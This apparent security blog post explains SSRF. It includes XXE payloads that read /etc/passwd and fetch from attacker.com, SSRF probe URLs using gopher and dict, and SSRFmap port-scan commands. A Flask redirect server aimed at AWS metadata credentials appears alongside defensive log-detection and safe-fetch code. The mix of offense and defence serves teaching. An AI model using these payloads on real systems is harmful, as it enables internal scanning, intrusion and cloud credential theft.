SSRF:

n00🔑
Apr 10, 2024

SSRF (Server-Side Request Forgery) is a technique used to subvert application logic: functionality intended to fetch content from other sources is turned into loading attacker-supplied targets. RFI and SSRF are very similar; the only difference is that RFI involves code execution, whereas with SSRF code execution may not be possible. The implications of SSRF are endless, from scanning the internal network to RCE, and chaining it with other issues can have a huge impact. For example, XXE can be escalated to SSRF by using http:// in place of file:// in the payload below.

XXE payload reading a local file:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

The same entity pointed at an HTTP URL, which turns the XXE into an SSRF:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" >]>
<foo>&xxe;</foo>

Detecting SSRF-

a) Using Burp Collaborator or Project Discovery's interactsh-

Note: In this case the server does not have access to the internet, so we will be using interactsh. In real scenarios I usually use Collaborator.

If we get only a DNS interaction in any of these tools, there is a possibility that HTTP is blocked. In that case we can try using other protocols like gopher.

Other online Collaborator-like services-

http://pingb.in/

https://swin.es/o/kOxHa

https://requestbin.net/

https://beeceptor.com/

b) Try accessing a known service-

In this case I already know SSH is running on port 22.

http://10.10.10.55:60000/url.php?path=http://10.10.10.55:22

If HTTP is blocked, try accessing it via other protocols.

http://10.10.10.55:60000/url.php?path=dict://10.10.10.55:22
http://10.10.10.55:60000/url.php?path=gopher://10.10.10.55:22

Other protocols-

sftp://attacker.com:port/
dict://attacker:port/
tftp://attacker.com:port/
ldap://localhost:port/
gopher://127.0.0.1:port/

Some of the things we can do with SSRF-

  1. Port scanning-

We can use SSRF to scan internal IPs for open TCP ports. Let's scan ports on the localhost (lo) interface.

I prefer to use SSRFmap. It has a module for port scanning. Let's see this in action:

By default it has a list of only the top 8000 ports. We can edit the ports list to include all 65535 ports-

seq 1 65535 > ./data/ports

We also need to copy the SSRF HTTP request to a file. We can simply copy the request and save it to a file, or use Burp Suite's Copy to file option.

Let's start the port scan-

python3 ssrfmap.py -r data/req.txt -p path -m portscan | tee portscan.out | grep open
  • -r specifies the request file
  • -p the vulnerable parameter name
  • -m the module to use

Now we find more services than when scanning from the external network-

We can also run the scan via Burp Intruder and sort the responses in descending order by length.
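Seen from the defender's side, a scan like the one above leaves a distinctive trace in the web server's access log: one client, one vulnerable parameter, many distinct ports for the same host in quick succession, and possibly non-HTTP schemes or link-local targets. The Python below is an added example, not code from this post or from SSRFmap. The endpoint `url.php` and the parameter name `path` are taken from the post's requests; the log lines are constructed for the demonstration, and the five-port threshold is an arbitrary assumption.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines (combined log format, URL-encoded query).
# One client walks ports on 10.10.10.55, tries gopher://, then the metadata IP;
# two other clients send ordinary traffic.
SAMPLE_LOG = """\
10.10.14.3 - - [10/Apr/2024:12:00:01 +0000] "GET /url.php?path=http%3A%2F%2F10.10.10.55%3A21 HTTP/1.1" 200 0
10.10.14.3 - - [10/Apr/2024:12:00:01 +0000] "GET /url.php?path=http%3A%2F%2F10.10.10.55%3A22 HTTP/1.1" 200 41
10.10.14.3 - - [10/Apr/2024:12:00:02 +0000] "GET /url.php?path=http%3A%2F%2F10.10.10.55%3A25 HTTP/1.1" 200 0
10.10.14.3 - - [10/Apr/2024:12:00:02 +0000] "GET /url.php?path=http%3A%2F%2F10.10.10.55%3A80 HTTP/1.1" 200 1532
10.10.14.3 - - [10/Apr/2024:12:00:03 +0000] "GET /url.php?path=http%3A%2F%2F10.10.10.55%3A443 HTTP/1.1" 200 0
10.10.14.3 - - [10/Apr/2024:12:00:03 +0000] "GET /url.php?path=http%3A%2F%2F10.10.10.55%3A3306 HTTP/1.1" 200 77
10.10.14.3 - - [10/Apr/2024:12:00:04 +0000] "GET /url.php?path=gopher%3A%2F%2F10.10.10.55%3A22 HTTP/1.1" 200 0
10.10.14.3 - - [10/Apr/2024:12:00:05 +0000] "GET /url.php?path=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 312
192.168.1.20 - - [10/Apr/2024:12:00:06 +0000] "GET /url.php?path=https%3A%2F%2Fexample.com%2Ffeed.xml HTTP/1.1" 200 8802
192.168.1.21 - - [10/Apr/2024:12:00:07 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

ALLOWED_SCHEMES = {"http", "https"}
# Link-local range; 169.254.169.254 (cloud instance metadata) lives here.
METADATA_NET = ipaddress.ip_network("169.254.0.0/16")


def extract_fetch_url(request_target, param="path"):
    """Return the attacker-controllable URL carried in `param`, or None."""
    values = parse_qs(urlparse(request_target).query).get(param)
    return values[0] if values else None


def target_findings(fetch_url):
    """Classify one fetch URL; returns a list of finding labels (may be empty)."""
    findings = []
    u = urlparse(fetch_url)
    if u.scheme.lower() not in ALLOWED_SCHEMES:
        findings.append(f"disallowed scheme {u.scheme}")
    try:
        ip = ipaddress.ip_address(u.hostname or "")
    except ValueError:
        return findings  # hostname, not an IP literal; this offline example does no DNS
    if ip in METADATA_NET:
        findings.append("cloud metadata / link-local target")
    elif ip.is_private or ip.is_loopback:
        findings.append("internal address target")
    return findings


def analyse(log_text, param="path", port_threshold=5):
    """Scan access-log text for SSRF indicators.

    Returns {'scans': {(client, host): [distinct ports]} for hosts probed on at
    least port_threshold ports, 'findings': [(client, fetch_url, label), ...]}.
    """
    ports_seen = defaultdict(set)
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        fetch_url = extract_fetch_url(m["target"], param)
        if fetch_url is None:
            continue
        for label in target_findings(fetch_url):
            findings.append((m["client"], fetch_url, label))
        u = urlparse(fetch_url)
        if not u.hostname:
            continue
        try:
            port = u.port
        except ValueError:  # malformed port in the supplied URL
            continue
        if port is None:
            port = 443 if u.scheme == "https" else 80
        ports_seen[(m["client"], u.hostname)].add(port)
    scans = {key: sorted(ports) for key, ports in ports_seen.items()
             if len(ports) >= port_threshold}
    return {"scans": scans, "findings": findings}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for (client, host), ports in result["scans"].items():
        print(f"port scan via SSRF: {client} -> {host} ports {ports}")
    for client, url, label in result["findings"]:
        print(f"{label}: {client} requested {url}")
```

The port-count rule catches the scan regardless of whether the scanner is SSRFmap or Intruder, because both produce the same one-request-per-port pattern; the per-request findings fire on a single request, which matters for the metadata endpoint where one hit is enough. In production the window should be time-bounded and hostnames resolved (see the fetch-side checks later in this post) rather than matched only as IP literals.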

SSRF bypass for accessing AWS metadata when a DNS resolution check is in place-

from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def home():
    # Every request to this host is answered with a 302 to the instance
    # metadata endpoint. A check that only resolves the hostname the user
    # submitted sees this server's public address and passes, while the
    # vulnerable fetcher then follows the redirect to 169.254.169.254.
    return redirect("http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance", code=302)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)
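The redirect trick works because the DNS resolution check inspects only the URL the user submitted; the fetcher then follows the 302 to 169.254.169.254 without re-checking. The Python below is an added example, not code from this post, that contrasts that flawed pattern (`naive_fetch`) with a fetch that validates the scheme and every resolved address on each hop and pins the checked address for the connection (`safe_fetch`). `FAKE_DNS`, `FAKE_SERVERS`, `fake_resolver` and `fake_transport` are constructed stand-ins so it runs offline; the hostnames and addresses are documentation values, and the metadata body is a placeholder.

```python
import ipaddress
from urllib.parse import urljoin, urlparse

ALLOWED_SCHEMES = {"http", "https"}
REDIRECT_CODES = {301, 302, 303, 307, 308}
# Ranges a server-side fetcher should never be steered into: loopback, RFC 1918,
# CGNAT, link-local (including the 169.254.169.254 metadata endpoint) and the
# IPv6 equivalents.
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed stand-in for DNS: hostname -> addresses. No real lookups happen.
FAKE_DNS = {
    "attacker.example": ["203.0.113.10"],
    "files.example": ["198.51.100.7"],
}
# Constructed stand-in for the servers: (host, path) -> (status, headers, body).
# attacker.example answers with the same 302 the Flask snippet above sends.
FAKE_SERVERS = {
    ("attacker.example", "/"): (302, {"Location": "http://169.254.169.254/latest/meta-data/"}, b""),
    ("169.254.169.254", "/latest/meta-data/"): (200, {}, b"[constructed metadata placeholder]"),
    ("files.example", "/report.txt"): (200, {}, b"quarterly report"),
}


class SSRFBlocked(Exception):
    pass


def fake_resolver(host):
    return FAKE_DNS.get(host, [])


def fake_transport(u, ip):
    """Pretend to connect to `ip` and send Host: u.hostname; real code opens the socket to `ip`."""
    return FAKE_SERVERS.get((u.hostname, u.path or "/"), (404, {}, b""))


def validate(url, resolver):
    """Check the scheme and every resolved address; return (parsed url, pinned ip)."""
    u = urlparse(url)
    if u.scheme.lower() not in ALLOWED_SCHEMES:
        raise SSRFBlocked(f"scheme {u.scheme!r} not allowed")
    if not u.hostname:
        raise SSRFBlocked("missing host")
    try:
        addrs = [ipaddress.ip_address(u.hostname)]  # IP literal, nothing to resolve
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolver(u.hostname)]
    if not addrs:
        raise SSRFBlocked(f"{u.hostname} does not resolve")
    for a in addrs:
        if any(a in net for net in BLOCKED_NETS):
            raise SSRFBlocked(f"{u.hostname} -> {a} is in a blocked range")
    return u, addrs[0]


def naive_fetch(url, resolver=fake_resolver, transport=fake_transport):
    """The flawed pattern: validate the submitted URL once, then follow redirects unchecked."""
    u, ip = validate(url, resolver)
    status, headers, body = transport(u, ip)
    while status in REDIRECT_CODES:
        u = urlparse(urljoin(u.geturl(), headers["Location"]))
        status, headers, body = transport(u, ip)
    return u.geturl(), body


def safe_fetch(url, resolver=fake_resolver, transport=fake_transport, max_redirects=3):
    """Re-validate (and re-pin the address) on every hop before fetching it."""
    for _ in range(max_redirects + 1):
        u, ip = validate(url, resolver)
        status, headers, body = transport(u, ip)
        if status not in REDIRECT_CODES:
            return u.geturl(), body
        url = urljoin(url, headers.get("Location", ""))  # Location may be relative
    raise SSRFBlocked("too many redirects")


def is_blocked(url, fetch=safe_fetch):
    """True if `fetch` refuses the URL (at any hop), False if it returns a body."""
    try:
        fetch(url)
        return False
    except SSRFBlocked:
        return True


if __name__ == "__main__":
    print("naive:", naive_fetch("http://attacker.example/"))   # follows the 302 into metadata
    print("safe blocks redirect:", is_blocked("http://attacker.example/"))
    print("safe fetch:", safe_fetch("http://files.example/report.txt"))
```

Two details carry the fix. First, the address returned by `validate` is the one the transport must actually connect to (sending the original `Host` header), otherwise a second lookup at connect time reopens a DNS-rebinding window. Second, the same check runs on every redirect hop, so the 302 from the Flask server above is refused at the point where the target becomes 169.254.169.254; a library that follows redirects internally must have that disabled and the loop handled as here.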


Written by n00🔑

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u
